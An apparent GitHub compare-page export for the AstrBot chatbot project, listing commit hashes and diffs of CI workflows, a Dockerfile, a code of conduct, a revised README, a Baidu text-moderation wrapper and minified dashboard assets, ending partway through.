Compare commits: publish2.5...v3.2.0 (612 commits)
Commit SHA1s (author, date, and message columns were not captured in this export):

f67b171385
1780d1355d
5a3390e4f3
337d96b41d
38a1dfea98
fbef73aeec
d6214c2b7c
d58c86f6fc
ea34c20198
934ca94e62
1775327c2e
707fcad8b4
f143c5afc6
99f94b2611
e39c1f9116
235e0b9b8f
d5a9bed8a4
d7dc8a7612
08cd3ca40c
a13562dcea
d7a0c0d1d0
c0729b2d29
a80f474290
699207dd54
e7708010c9
f66091e08f
03bb932f8f
fbf8b349e0
e9278fce6a
9a7db956d5
13196dd667
52b80e24d2
7dff87e65d
31ee64d1b2
8e865b6918
66f91e5832
cd2d368f9c
7736c1c9bd
6728c0b7b5
344f92e0e7
fdabfef6a7
6c5718f134
edfde51434
3fc1347bba
e643eea365
1af481f5f9
317d1c4c41
a703860512
1cd1c8ea0d
53ef3bbf4f
ab7b8aad7c
c49213282b
3c87fc5b31
9684508e1d
bb0edae200
acb68a4a1e
46dd6f3243
ecab072890
148534d3c2
1278f16973
7d9b3c6c5c
83dcb5165c
30862bb82f
6c0bda8feb
e14dece206
680593d636
144440214f
6667b58a3f
b55d9533be
3484fc60e6
eac0265522
ac74431633
4c098200be
2cf18972f3
d522d2a6a9
7079ce096f
5e8c5067b1
570ff4e8b6
e2f1362a1f
3519e38211
08734250f7
e8407f6449
04f3400f83
89c8b3e7fc
66294100ec
8ed8a23c8b
449b0b03b5
d93754bf1d
a007a61ecc
e481377317
4c5831c7b4
fc54b5237f
f8f42678d1
38b1f4128c
04fb4f88ad
4675f5df08
34ee358d40
c4cfd1a3e2
5ac4748537
2e5ec1d2dc
bac4c069d7
9d4a21a10b
dbeb41195d
71f4998458
40af5b7574
e7a1020f82
018e49ed95
582cfe9f7c
db07f740b3
bacbd351d7
7e2c61c661
3df30fd4de
92789ffdc9
09b746cdec
8ace7b59e3
1fc0248d8f
57bde33bfe
1b1e558a3b
c5c7e686d0
bd28f880f6
fe2ab69773
75f9d383cb
5fefba4583
780d126437
4057dd9f5b
b5f8df4bb6
5ace10d39f
07ecdedf0d
c2ca365312
8b9ca08903
16e6b588f6
3a1d5d8904
84d1293fd0
a12be7fa77
6eee4f678f
0e53c95c06
3ba97ad0dc
99ff8bc1f5
63aa6ee9a5
925a42e2c4
8dc91cfed4
9c6bdeea9d
9bc8ac10fa
3df3879954
be1f8e7075
d602041ad0
23882bcb8e
311178189f
5a57526aab
450dd34f4d
89ed31a888
9fe031efe3
baa57266b4
3e4818d0ee
b36747c728
fdbe993913
9c3c8ff2c4
aaefdab0aa
f18a311bc2
ad9705f9c4
fb0b626813
b48fbf10e1
4aa2eab8b6
3960a19bcb
b3cec4781b
8f0b0bf0d0
847672d7f1
c7f2962654
752201cb46
deebf61b5f
d5e5b06e86
cb5975c102
5b1aee1b4d
510c8b4236
89fc7b0553
123c21fcb3
75d62d66f9
23a8e989a5
9577e637f1
e51ef2201b
f4ae503abf
3424b658f3
3198f73f3d
aa3262a8ab
6acd7be547
fb7669ddad
f2c4ef126e
33dcc4c152
b9e331ebd6
7832ec386e
b9828428cc
da11034aec
578c9e0695
cc675a9b4f
08e7d4d0c6
553f1b8d83
73e7e2088d
e40c9de610
2f4e0bb4f2
191976e22e
52656b8586
998e29ded6
5bbe3f12d6
56aea81ed7
7b8a311dde
b75d20a3e8
67faa587b6
15fde686d4
741284f6e8
8352fc269b
5852f36557
cc1c723c12
adf5cbfeba
d6d0516c9a
8aab10aaf3
4fe5616ae1
7e1c76a3f5
f74665ff71
a96d64fe88
fd2aa0cba6
a92ea3db02
d7a513b640
8a017ff693
7d08f57b32
6f4ad7890b
37488118a6
b2da0778ae
cc887a5037
ca86a02d30
d652dc19a6
6a56b7bff5
81e8997852
372a204ba9
15ad5aae35
fd2e9ef93f
5be3bf1f46
4915c2d480
bd56a19ac5
da8fa2d905
f56fd100d7
b725a1a20c
ff1b5d02d2
d4882a8240
e37f84c1ae
a23bd0a63c
ae00e84974
53b3250978
7f15a59a4e
6a164c9961
bd779a3df3
9ebb340c00
e8edbaae2d
2aab1f4c96
90ea621c65
34bdceb41b
6d2ded1c6c
9b926048ca
9cf4f0f57d
9123b9d773
f9258ae1e1
d8808de4a9
afcb152d8d
ff01174a1f
71f1625284
19e3390083
3015b90e12
aa419f3ef9
954236c284
72d6b3886b
a95046ecaf
ccdb11575b
7e68b2f2be
39efab1081
cc6707c8ce
09080adf84
4cc72030c0
a395902184
5156f0584a
be171fe0d7
ad4bf5e654
da7429ad62
b5f20ee282
a9023d6f3a
628b661a18
638fe466f8
a90adcf15c
7896066db6
b1314bcc31
b1ecc929f2
3aad42a886
b6e87d3d31
461eb4b9c7
a89e92d5cc
6e69e88e91
ae732c1dac
8e4a72c97b
bf0d82fe67
987383f957
c2cacf3281
72878477dc
ad0d14420a
5a7c60c81e
6011840d1f
9a2dffe299
e6770d2b12
255db6ee57
aa9ff99557
5f024e9f30
cbdc7b7ce4
5f636ca061
9fa3651170
bba66788c3
200f3cce00
938490b739
e77e7b050a
bd2dbe5b63
c684d9cb4a
7a39a9d45e
2a3bb068db
1aa4384ca3
3b26b7b26c
3b097d662b
c3acb3e77f
55d58d30a8
020a8ace9f
15f56ffc01
3724659b32
df77152581
339ea5f12a
36f96ccc97
190e0a4971
72638fac68
807d19e381
10870172b4
1f7d3eccf9
5fc58123bb
c84c9f4aaa
cabe66fc0a
9f1315b06d
6f27f59730
17815e7fe3
596ae80fea
be2dc6ba70
e5aa8c8270
7c5ac41c55
c6cf1153c1
a68338b651
bab46e912e
4b158a1c89
6894900e46
2e11d6e007
348381be15
9024c28e70
ae1702901b
c1c0df85e6
f3c6d9c02b
811a885411
b4ec28b71c
cdf4a5321b
d83f155f80
4c402ed5bd
ec5aff8d0b
eae0d6c422
9c284b84b1
9f36e5ae05
7caa380e54
41d81bb60e
454a74f4e1
c5bdad02e5
f46de3d518
a3e21bea1a
d7e4707d5d
a78ebf2fd7
bd11541678
0d99aa81e6
f104d40d0a
0d69f8ab8a
66d1fc08b6
e32fc27728
eec890cd02
d30881e59b
9afaf83368
33f9a9cfa0
bf72d5fa27
567c29bcd6
dcdfe453fb
0d23c0900b
86eda7bdf8
1e46525b0f
8d41efea4d
f15d0eb0eb
1795362bcd
2bf9c82617
33793a2053
656fe14af4
46197d49a4
843ab56f50
6b4b52f3c5
392e5cd592
d273019830
fd59ec4b6c
bf33ccafca
425936872d
6627b2e1e5
323c2cecf8
5b1dd3dce9
54af770dfb
30a48fea6e
cfd5fb1452
a78984376f
9887cae43c
e63fe60f8d
b0ac2d676c
5ef515165c
e21d43f920
3a80ffad88
47506d60cd
b999b712b7
6860ba3f05
02594867c0
250435f3e7
3c593fb6f7
807cad5c48
e92ecdd3f8
1c91079d8f
376b2fef40
300f3b6df8
6e6f6d5cd4
077e54d0f1
18ffaa2b91
a6555681a0
43ac0ef87c
754842be7c
5b3ee2dbe8
ca5a1ddc0b
c9821132ad
0641dca2a6
fd983b9f5d
7e1e51c450
d912b990e4
8224aa87a5
4cb5abc7b6
743a800b0d
a5c43612bf
e2bd612b8e
3ddb65e399
56775580fc
8f7703c158
7aba9ff3ff
aea1271a94
b575f195c9
1eedf7b332
d327a1041b
10a3ba7dd4
deaa4ea910
fbfceb3137
e7b9d7cd54
34aba58351
e1639be6c3
80975c5715
c12a4f7353
defab688e5
2244386d33
39244fa27f
20c19905ac
8086d645f9
3a3289bf04
1711ff3bb5
b945913f88
d31533ed82
0fb2ec2c76
89847cbc83
9d12bb23fd
79af4ce381
79f293e248
e75a0fec01
a935b085d4
4ef0a14420
8273154904
71d6ef3b52
119b3a090a
496df3347b
2b70eef35b
c4071eedf8
b6cc866113
6aabcdeac7
72bccee9e2
b54f934fcd
43dc0f96ff
e02a82fa72
9f91b0c92b
d14d6364a3
15c8f0b6f7
9bca158174
45bb30692d
5bf73caba7
e5389f620a
61fd52ff61
73c46bd812
d8173122e0
1af6e77dd1
ce476ca163
0a1df90a83
762f5ea30f
06e7753797
c5e1f8d3e9
221433725b
28864cd066
854f70dc8b
435b988223
ecc119b296
209f3aa136
8935859934
6c77ec3534
291d3ebae8
5b97fd2e6f
4de8c5ed7d
09333d1604
60240ca9a1
3e45ec0a08
4aad04b31a
99ff3f8d42
f9a7a723aa
7bb4ad648a
7c3cb98cf8
0cc6bc0f1d
4181d62b5c
7a1c0b0821
b74d32c2c8
e320bb5ab8
076cfd3e97
515a937c07
2c5451120e
e6f6bee7ee
1a137a8639
c8f6d090cc
b7b7877dfc
608bd0398e
2541663b77
5d774f3d7b
6ea1366e73
134a8e233a
6ccfc674a5
37e9373561
bfa8f137de
66a85cddf5
bf84e74490
3d8f96ef8a
84c57a47ad
5e101bb3c0
246fbd6337
9938e4392a
10cda13213
f3722b31d5
673a4e2c7f
1d8fba05b6
7c06883975
6da12b7a67
0342d752e6
a851e34c94
ad8aed5724
75101bf270
43df7003d6
502703b749
8365f39f95
aa5f8db59d
d2b60b72d9
14c36ceb52
cdc3bdd769
48d0c2a8c8
6923979014
03239439c9
da3381a887
a1253cc241
ffe10cc5c2
7093cf5ab8
979a0cdd2e
b495a11d1f
8698e87e51
6d2f9e5ba8
0e24e107d6
888a4e89ab
1a55684ae8
858712dcbc
ad4d068bbc
0f5a2101b7
7bc9d8dc7b
506a62e6e6
44e22087d8
d88c06578d
93bc12a89c
eedcb9b825
b8fe50a196
10b1538118
09cfd18f6f
d01be66344
c0e4d0595b
d403323a36
3092bbd210
9d2cd27705
ec48b57358
54cdca01d3
4b35f7f8fd
651ba7b3d6
cd1390d449
d478ff02b6
1da3a19ddd
db66cbfb9c
51729f4a50
d739abef60
2ecb3fc7cf
69c576086e
23
.github/workflows/docker-image.yml
vendored
Normal file
@@ -0,0 +1,23 @@
name: Docker Image CI/CD

on:
  release:
    types: [published]
  workflow_dispatch:
jobs:
  publish-latest-docker-image:
    runs-on: ubuntu-latest
    name: Build and publish docker image

    steps:
      - name: Checkout
        uses: actions/checkout@v2
      - name: Build image
        run: |
          git clone https://github.com/Soulter/AstrBot
          cd AstrBot
          docker build -t ${{ secrets.DOCKER_HUB_USERNAME }}/astrbot:latest .
      - name: Publish image
        run: |
          docker login -u ${{ secrets.DOCKER_HUB_USERNAME }} -p ${{ secrets.DOCKER_HUB_PASSWORD }}
          docker push ${{ secrets.DOCKER_HUB_USERNAME }}/astrbot:latest
27
.github/workflows/stale.yml
vendored
Normal file
@@ -0,0 +1,27 @@
# This workflow warns and then closes issues and PRs that have had no activity for a specified amount of time.
#
# You can adjust the behavior by modifying this file.
# For more information, see:
# https://github.com/actions/stale
name: Mark stale issues and pull requests

on:
  schedule:
    - cron: '21 23 * * *'

jobs:
  stale:

    runs-on: ubuntu-latest
    permissions:
      issues: write
      pull-requests: write

    steps:
      - uses: actions/stale@v5
        with:
          repo-token: ${{ secrets.GITHUB_TOKEN }}
          stale-issue-message: 'Stale issue message'
          stale-pr-message: 'Stale pull request message'
          stale-issue-label: 'no-issue-activity'
          stale-pr-label: 'no-pr-activity'
13
.gitignore
vendored
Normal file
@@ -0,0 +1,13 @@
__pycache__
botpy.log
.vscode
data.db
configs/session
configs/config.yaml
**/.DS_Store
temp
cmd_config.json
addons/plugins/
data/*
cookies.json
logs/
3
.vscode/settings.json
vendored
@@ -1,3 +0,0 @@
{
    "python.analysis.typeCheckingMode": "basic"
}
128
CODE_OF_CONDUCT.md
Normal file
@@ -0,0 +1,128 @@
# Contributor Covenant Code of Conduct

## Our Pledge

We as members, contributors, and leaders pledge to make participation in our
community a harassment-free experience for everyone, regardless of age, body
size, visible or invisible disability, ethnicity, sex characteristics, gender
identity and expression, level of experience, education, socio-economic status,
nationality, personal appearance, race, religion, or sexual identity
and orientation.

We pledge to act and interact in ways that contribute to an open, welcoming,
diverse, inclusive, and healthy community.

## Our Standards

Examples of behavior that contributes to a positive environment for our
community include:

* Demonstrating empathy and kindness toward other people
* Being respectful of differing opinions, viewpoints, and experiences
* Giving and gracefully accepting constructive feedback
* Accepting responsibility and apologizing to those affected by our mistakes,
  and learning from the experience
* Focusing on what is best not just for us as individuals, but for the
  overall community

Examples of unacceptable behavior include:

* The use of sexualized language or imagery, and sexual attention or
  advances of any kind
* Trolling, insulting or derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or email
  address, without their explicit permission
* Other conduct which could reasonably be considered inappropriate in a
  professional setting

## Enforcement Responsibilities

Community leaders are responsible for clarifying and enforcing our standards of
acceptable behavior and will take appropriate and fair corrective action in
response to any behavior that they deem inappropriate, threatening, offensive,
or harmful.

Community leaders have the right and responsibility to remove, edit, or reject
comments, commits, code, wiki edits, issues, and other contributions that are
not aligned to this Code of Conduct, and will communicate reasons for moderation
decisions when appropriate.

## Scope

This Code of Conduct applies within all community spaces, and also applies when
an individual is officially representing the community in public spaces.
Examples of representing our community include using an official e-mail address,
posting via an official social media account, or acting as an appointed
representative at an online or offline event.

## Enforcement

Instances of abusive, harassing, or otherwise unacceptable behavior may be
reported to the community leaders responsible for enforcement at
SoulterL@outlook.com.
All complaints will be reviewed and investigated promptly and fairly.

All community leaders are obligated to respect the privacy and security of the
reporter of any incident.

## Enforcement Guidelines

Community leaders will follow these Community Impact Guidelines in determining
the consequences for any action they deem in violation of this Code of Conduct:

### 1. Correction

**Community Impact**: Use of inappropriate language or other behavior deemed
unprofessional or unwelcome in the community.

**Consequence**: A private, written warning from community leaders, providing
clarity around the nature of the violation and an explanation of why the
behavior was inappropriate. A public apology may be requested.

### 2. Warning

**Community Impact**: A violation through a single incident or series
of actions.

**Consequence**: A warning with consequences for continued behavior. No
interaction with the people involved, including unsolicited interaction with
those enforcing the Code of Conduct, for a specified period of time. This
includes avoiding interactions in community spaces as well as external channels
like social media. Violating these terms may lead to a temporary or
permanent ban.

### 3. Temporary Ban

**Community Impact**: A serious violation of community standards, including
sustained inappropriate behavior.

**Consequence**: A temporary ban from any sort of interaction or public
communication with the community for a specified period of time. No public or
private interaction with the people involved, including unsolicited interaction
with those enforcing the Code of Conduct, is allowed during this period.
Violating these terms may lead to a permanent ban.

### 4. Permanent Ban

**Community Impact**: Demonstrating a pattern of violation of community
standards, including sustained inappropriate behavior, harassment of an
individual, or aggression toward or disparagement of classes of individuals.

**Consequence**: A permanent ban from any sort of public interaction within
the community.

## Attribution

This Code of Conduct is adapted from the [Contributor Covenant][homepage],
version 2.0, available at
https://www.contributor-covenant.org/version/2/0/code_of_conduct.html.

Community Impact Guidelines were inspired by [Mozilla's code of conduct
enforcement ladder](https://github.com/mozilla/diversity).

[homepage]: https://www.contributor-covenant.org

For answers to common questions about this code of conduct, see the FAQ at
https://www.contributor-covenant.org/faq. Translations are available at
https://www.contributor-covenant.org/translations.
8
Dockerfile
Normal file
@@ -0,0 +1,8 @@
FROM python:3.10.13-bullseye
WORKDIR /AstrBot

COPY . /AstrBot/

RUN python -m pip install -r requirements.txt

CMD [ "python", "main.py" ]
135
README.md
@@ -1,20 +1,70 @@
# 2023/3/2: The official ChatGPT API is now supported, with better performance!!!
<p align="center">

<img src="https://github.com/Soulter/AstrBot/assets/37870767/b1686114-f3aa-4963-b07f-28bf83dc0a10" alt="QQChannelChatGPT" width="200" />
</p>
<div align="center">

## ⭐Try it out
# AstrBot

Scan the QR code with mobile QQ to join the QQ channel (channel name: GPT机器人 | channel ID: x42d56aki2)
[](https://github.com/Soulter/AstrBot/releases/latest)
<img src="https://wakatime.com/badge/user/915e5316-99c6-4563-a483-ef186cf000c9/project/34412545-2e37-400f-bedc-42348713ac1f.svg" alt="wakatime">
<img src="https://img.shields.io/badge/python-3.9+-blue.svg" alt="python">
<a href="https://hub.docker.com/r/soulter/astrbot"><img alt="Docker pull" src="https://img.shields.io/docker/pulls/soulter/astrbot.svg"/></a>
<a href="https://qm.qq.com/cgi-bin/qm/qr?k=EYGsuUTfe00_iOu9JTXS7_TEpMkXOvwv&jump_from=webapi&authKey=uUEMKCROfsseS+8IzqPjzV3y1tzy4AkykwTib2jNkOFdzezF9s9XknqnIaf3CDft">
<img alt="Static Badge" src="https://img.shields.io/badge/QQ群-322154837-purple">
</a>
<img alt="Static Badge" src="https://img.shields.io/badge/频道-x42d56aki2-purple">


<a href="https://astrbot.soulter.top/center">Deployment</a> |
<a href="https://github.com/Soulter/QQChannelChatGPT/issues">Report an issue</a> |
<a href="https://astrbot.soulter.top/center/docs/%E5%BC%80%E5%8F%91/%E6%8F%92%E4%BB%B6%E5%BC%80%E5%8F%91">Plugin development (as few as 25 lines)</a>
</div>

**Windows users: the one-click Windows installer is recommended; download the latest version from the Releases page**
## 🤔Things you may want to know
- **How do I deploy it?** [Documentation](https://astrbot.soulter.top/center/docs/%E9%83%A8%E7%BD%B2/%E9%80%9A%E8%BF%87Docker%E9%83%A8%E7%BD%B2) (if deployment fails, feel free to join the QQ group and ask for help <3)
- **go-cqhttp does not start or reports a login failure?** [Search for a solution here](https://github.com/Mrs4s/go-cqhttp/issues)
- **The program crashes / the bot does not start?** [Open an issue or report it in the group](https://github.com/Soulter/QQChannelChatGPT/issues)
- **How do I enable language models such as ChatGPT, Claude, or HuggingChat?** [See the docs](https://astrbot.soulter.top/center/docs/%E4%BD%BF%E7%94%A8/%E5%A4%A7%E8%AF%AD%E8%A8%80%E6%A8%A1%E5%9E%8B)

**Detailed deployment tutorial:** https://soulter.top/posts/qpdg.html
## 🧩Features:

If you run into any problems, please report them in the channel.
✨ Recently added:
1. Visual dashboard
2. One-click Docker deployment: [link](https://astrbot.soulter.top/center/docs/%E9%83%A8%E7%BD%B2/%E9%80%9A%E8%BF%87Docker%E9%83%A8%E7%BD%B2)

## ⭐Features:
🌍Supported messaging platforms/interfaces
- go-cqhttp (QQ, QQ Channels)
- Official QQ bot API
- Telegram (provided by the [astrbot_plugin_telegram](https://github.com/Soulter/astrbot_plugin_telegram) plugin)

🌍Supported AI language models:

**Text models / image understanding**

- OpenAI GPT-3 (built-in)
- OpenAI GPT-3.5 (built-in)
- OpenAI GPT-4 (built-in)
- Claude (free, provided by the [LLMs plugin](https://github.com/Soulter/llms))
- HuggingChat (free, provided by the [LLMs plugin](https://github.com/Soulter/llms))
- Gemini (free, provided by the [LLMs plugin](https://github.com/Soulter/llms))

**Image generation**
- OpenAI Dalle API
- NovelAI/Naifu (free, provided by the [AIDraw plugin](https://github.com/Soulter/aidraw))

🌍Bot capabilities at a glance:
- Visual dashboard (beta)
- Deploy the bot to QQ and QQ Channels at the same time
- LLM conversations
- LLM web search **(currently only OpenAI-family models; in the latest version, enable it with the `web on` command)**
- Plugins (type `plugin` in a QQ or QQ Channel chat for details)
- Rendering text replies as images (replies are sent as Markdown rendered to an image, which **greatly reduces the chance of being flagged by risk control**; enable qq_pic_mode manually in `cmd_config.json`)
- Persona settings
- Keyword replies
- Hot update (to update this project, **just** type `update latest r` in a QQ or QQ Channel chat)
- One-click Windows deployment: https://github.com/Soulter/QQChatGPTLauncher/releases/latest

<!--
### Basic features
<details>
<summary>✅ Context-aware replies</summary>
@@ -69,11 +119,37 @@

- The QQ Channel bot framework is QQ's official open-source framework and is stable.

</details>
</details> -->

> About tokens: a token is roughly a word unit for the AI (though not exactly one word); the `text-davinci-003` model supports at most `4097` tokens. When sending a message, this bot packages the user's chat history and sends it to ChatGPT, so the `token` count accumulates accordingly; cached tokens exist to keep the conversation context coherent.
### Commands
You need to `@` the bot first, then type the command.
<!-- > About tokens: a token is roughly a word unit for the AI (though not exactly one word); the `text-davinci-003` model supports at most `4097` tokens. When sending a message, this bot packages the user's chat history and sends it to ChatGPT, so the `token` count accumulates accordingly; cached tokens exist to keep the conversation context coherent. -->

### 🛠️ Plugin support

This project supports plugins.

> Install one with `plugin i <plugin GitHub URL>`.

Some plugins:

- `LLMS`: https://github.com/Soulter/llms | Claude and HuggingChat LLM integration.

- `GoodPlugins`: https://github.com/Soulter/goodplugins | Random anime images, anime lookup, "good news" image generator, and more

- `sysstat`: https://github.com/Soulter/sysstatqcbot | Check system status

- `BiliMonitor`: https://github.com/Soulter/BiliMonitor | Subscribe to Bilibili feeds

- `liferestart`: https://github.com/Soulter/liferestart | Life Restart simulator


<img width="900" alt="image" src="https://github.com/Soulter/AstrBot/assets/37870767/824d1ff3-7b85-481c-b795-8e62dedb9fd7">


<!--
### Commands

#### Official OpenAI API
In a channel you need to `@` the bot before typing a command; in QQ, for now, prefix the message with `ai ` instead of @-ing the bot
- `/reset` reset the prompt
- `/his` view chat history (each user has an independent session)
- `/his [page]` view a given page of the history, e.g. `/his 2` shows page 2
@@ -83,33 +159,22 @@
- `/help` show help
- `/key` add a key dynamically
- `/set` persona settings panel
- `/keyword nihao 你好` set a keyword reply: nihao -> 你好
- `/画` draw a picture

## 📰Usage:
#### Reverse-engineered ChatGPT library models
- `/gpt` switch to the official OpenAI API

**Detailed deployment tutorial:** https://soulter.top/posts/qpdg.html
* The model-switching commands also support one-off use, e.g. `/a 你好` will use the Bing model for a single reply -->
<!--
## 🙇Acknowledgements

### Install third-party libraries
This project makes use of the following projects:

Install them with Python's pip tool
- `qq-botpy` (official QQ Channels Python SDK)
- `openai` (OpenAI Python SDK)
[ChatGPT by acheong08](https://github.com/acheong08/ChatGPT)

```shell
pip install -r requirements.txt
```
> ⚠Note: the qq-botpy library requires `Python 3.8+`, so this project must also run on that version or newer
[EdgeGPT by acheong08](https://github.com/acheong08/EdgeGPT)

### Configuration
[go-cqhttp by Mrs4s](https://github.com/Mrs4s/go-cqhttp)

- Get an OpenAI key: [OpenAI](https://beta.openai.com/)
- Get a QQ Channel bot token and appid from the [QQ Open Platform](https://q.qq.com/), plus a QQ Channel bot (easy to create~)
- Configure everything in configs/config.yaml

### Start
- Run main.py


## DEMO



[nakuru-project by Lxns-Network](https://github.com/Lxns-Network/nakuru-project) -->
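The README's plugin section above says a plugin is installed by sending `plugin i <plugin GitHub URL>` in chat, and the new `.gitignore` excludes `addons/plugins/`, so installation amounts to fetching the plugin repository into that directory and loading it. A hypothetical illustration of that step only; this is not AstrBot's actual installer, and the function name and layout are assumptions:

```python
# Hypothetical sketch of what `plugin i <repo URL>` boils down to: clone the
# plugin repo into addons/plugins/. Not AstrBot's real loader.
import subprocess
from pathlib import Path

PLUGIN_DIR = Path("addons/plugins")  # directory ignored by the new .gitignore


def install_plugin(repo_url: str) -> Path:
    """Clone a plugin repository into addons/plugins/ and return its path."""
    PLUGIN_DIR.mkdir(parents=True, exist_ok=True)
    name = repo_url.rstrip("/").split("/")[-1].removesuffix(".git")
    target = PLUGIN_DIR / name
    if not target.exists():
        subprocess.run(["git", "clone", repo_url, str(target)], check=True)
    return target


# Example: fetch the LLMs plugin listed in the README above.
install_plugin("https://github.com/Soulter/llms")
```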
29
addons/baidu_aip_judge.py
Normal file
@@ -0,0 +1,29 @@
from aip import AipContentCensor


class BaiduJudge:
    def __init__(self, baidu_configs) -> None:
        if 'app_id' in baidu_configs and 'api_key' in baidu_configs and 'secret_key' in baidu_configs:
            self.app_id = str(baidu_configs['app_id'])
            self.api_key = baidu_configs['api_key']
            self.secret_key = baidu_configs['secret_key']
            self.client = AipContentCensor(
                self.app_id, self.api_key, self.secret_key)
        else:
            raise ValueError("Baidu configs error! 请填写百度内容审核服务相关配置!")

    def judge(self, text):
        res = self.client.textCensorUserDefined(text)
        if 'conclusionType' not in res:
            return False, "百度审核服务未知错误"
        if res['conclusionType'] == 1:
            return True, "合规"
        else:
            if 'data' not in res:
                return False, "百度审核服务未知错误"
            count = len(res['data'])
            info = f"百度审核服务发现 {count} 处违规:\n"
            for i in res['data']:
                info += f"{i['msg']};\n"
            info += "\n判断结果:"+res['conclusion']
            return False, info
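`BaiduJudge` above wraps Baidu's `AipContentCensor` text-moderation client: `judge()` returns a `(passed, message)` tuple, and `passed` is `True` only when the service reports `conclusionType == 1`. A minimal usage sketch, assuming the file sits at `addons/baidu_aip_judge.py` as in this diff; the credential values are placeholders:

```python
# Sketch only: the credentials below are placeholders from the Baidu AI console.
from addons.baidu_aip_judge import BaiduJudge

baidu_configs = {
    "app_id": 12345678,           # placeholder App ID
    "api_key": "your-api-key",    # placeholder API key
    "secret_key": "your-secret",  # placeholder secret key
}

judge = BaiduJudge(baidu_configs)
passed, info = judge.judge("需要审核的消息文本")
if not passed:
    print("Message rejected:", info)  # info lists the violations found
```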
1
addons/dashboard/dist/_redirects
vendored
Normal file
@@ -0,0 +1 @@
/* /index.html 200
1
addons/dashboard/dist/assets/BaseBreadcrumb-4d676ba5.css
vendored
Normal file
@@ -0,0 +1 @@
.page-breadcrumb .v-toolbar{background:transparent}
1
addons/dashboard/dist/assets/BaseBreadcrumb.vue_vue_type_style_index_0_lang-e31f96f8.js
vendored
Normal file
@@ -0,0 +1 @@
import{x as i,o as l,c as _,w as s,a as e,f as a,J as m,V as c,b as t,t as u,ad as p,B as n,ae as o,j as f}from"./index-dc96e1be.js";const b={class:"text-h3"},h={class:"d-flex align-center"},g={class:"d-flex align-center"},V=i({__name:"BaseBreadcrumb",props:{title:String,breadcrumbs:Array,icon:String},setup(d){const r=d;return(x,B)=>(l(),_(c,{class:"page-breadcrumb mb-1 mt-1"},{default:s(()=>[e(a,{cols:"12",md:"12"},{default:s(()=>[e(m,{variant:"outlined",elevation:"0",class:"px-4 py-3 withbg"},{default:s(()=>[e(c,{"no-gutters":"",class:"align-center"},{default:s(()=>[e(a,{md:"5"},{default:s(()=>[t("h3",b,u(r.title),1)]),_:1}),e(a,{md:"7",sm:"12",cols:"12"},{default:s(()=>[e(p,{items:r.breadcrumbs,class:"text-h5 justify-md-end pa-1"},{divider:s(()=>[t("div",h,[e(n(o),{size:"17"})])]),prepend:s(()=>[e(f,{size:"small",icon:"mdi-home",class:"text-secondary mr-2"}),t("div",g,[e(n(o),{size:"17"})])]),_:1},8,["items"])]),_:1})]),_:1})]),_:1})]),_:1})]),_:1}))}});export{V as _};
1
addons/dashboard/dist/assets/BlankLayout-1694b31c.js
vendored
Normal file
@@ -0,0 +1 @@
import{x as e,o as a,c as t,w as o,a as s,B as n,Z as r,W as c}from"./index-dc96e1be.js";const f=e({__name:"BlankLayout",setup(p){return(u,_)=>(a(),t(c,null,{default:o(()=>[s(n(r))]),_:1}))}});export{f as default};
1
addons/dashboard/dist/assets/ColorPage-757221a5.js
vendored
Normal file
@@ -0,0 +1 @@
import{_ as m}from"./BaseBreadcrumb.vue_vue_type_style_index_0_lang-e31f96f8.js";import{_}from"./UiParentCard.vue_vue_type_script_setup_true_lang-f2b2db58.js";import{x as p,D as a,o as r,s,a as e,w as t,f as o,V as i,F as n,u as g,c as h,a0 as b,e as x,t as y}from"./index-dc96e1be.js";const P=p({__name:"ColorPage",setup(C){const c=a({title:"Colors Page"}),d=a([{title:"Utilities",disabled:!1,href:"#"},{title:"Colors",disabled:!0,href:"#"}]),u=a(["primary","lightprimary","secondary","lightsecondary","info","success","accent","warning","error","darkText","lightText","borderLight","inputBorder","containerBg"]);return(V,k)=>(r(),s(n,null,[e(m,{title:c.value.title,breadcrumbs:d.value},null,8,["title","breadcrumbs"]),e(i,null,{default:t(()=>[e(o,{cols:"12",md:"12"},{default:t(()=>[e(_,{title:"Color Palette"},{default:t(()=>[e(i,null,{default:t(()=>[(r(!0),s(n,null,g(u.value,(l,f)=>(r(),h(o,{md:"3",cols:"12",key:f},{default:t(()=>[e(b,{rounded:"md",class:"align-center justify-center d-flex",height:"100",width:"100%",color:l},{default:t(()=>[x("class: "+y(l),1)]),_:2},1032,["color"])]),_:2},1024))),128))]),_:1})]),_:1})]),_:1})]),_:1})],64))}});export{P as default};
1
addons/dashboard/dist/assets/ConfigDetailCard-8467c848.js
vendored
Normal file
@@ -0,0 +1 @@
import{o as l,s as o,u as c,c as n,w as u,Q as g,b as s,R as k,F as t,ab as h,O as p,t as m,a as V,ac as f,i as C,q as x,k as v,A as U}from"./index-dc96e1be.js";import{_ as w}from"./UiParentCard.vue_vue_type_script_setup_true_lang-f2b2db58.js";const S={__name:"ConfigDetailCard",props:{config:Array},setup(d){return(y,B)=>(l(!0),o(t,null,c(d.config,r=>(l(),n(w,{key:r.name,title:r.name,style:{"margin-bottom":"16px"}},{default:u(()=>[g(s("a",null,"No data",512),[[k,d.config.length===0]]),(l(!0),o(t,null,c(r.body,e=>(l(),o(t,null,[e.config_type==="item"?(l(),o(t,{key:0},[e.val_type==="bool"?(l(),n(h,{key:0,modelValue:e.value,"onUpdate:modelValue":a=>e.value=a,label:e.name,hint:e.description,color:"primary",inset:""},null,8,["modelValue","onUpdate:modelValue","label","hint"])):e.val_type==="str"?(l(),n(p,{key:1,modelValue:e.value,"onUpdate:modelValue":a=>e.value=a,label:e.name,hint:e.description,style:{"margin-bottom":"8px"},variant:"outlined"},null,8,["modelValue","onUpdate:modelValue","label","hint"])):e.val_type==="int"?(l(),n(p,{key:2,modelValue:e.value,"onUpdate:modelValue":a=>e.value=a,label:e.name,hint:e.description,style:{"margin-bottom":"8px"},variant:"outlined"},null,8,["modelValue","onUpdate:modelValue","label","hint"])):e.val_type==="list"?(l(),o(t,{key:3},[s("span",null,m(e.name),1),V(f,{modelValue:e.value,"onUpdate:modelValue":a=>e.value=a,chips:"",clearable:"",label:"请添加",multiple:"","prepend-icon":"mdi-tag-multiple-outline"},{selection:u(({attrs:a,item:i,select:b,selected:_})=>[V(C,x(a,{"model-value":_,closable:"",onClick:b,"onClick:close":D=>y.remove(i)}),{default:u(()=>[s("strong",null,m(i),1)]),_:2},1040,["model-value","onClick","onClick:close"])]),_:2},1032,["modelValue","onUpdate:modelValue"])],64)):v("",!0)],64)):e.config_type==="divider"?(l(),n(U,{key:1,style:{"margin-top":"8px","margin-bottom":"8px"}})):v("",!0)],64))),256))]),_:2},1032,["title"]))),128))}};export{S as _};
1
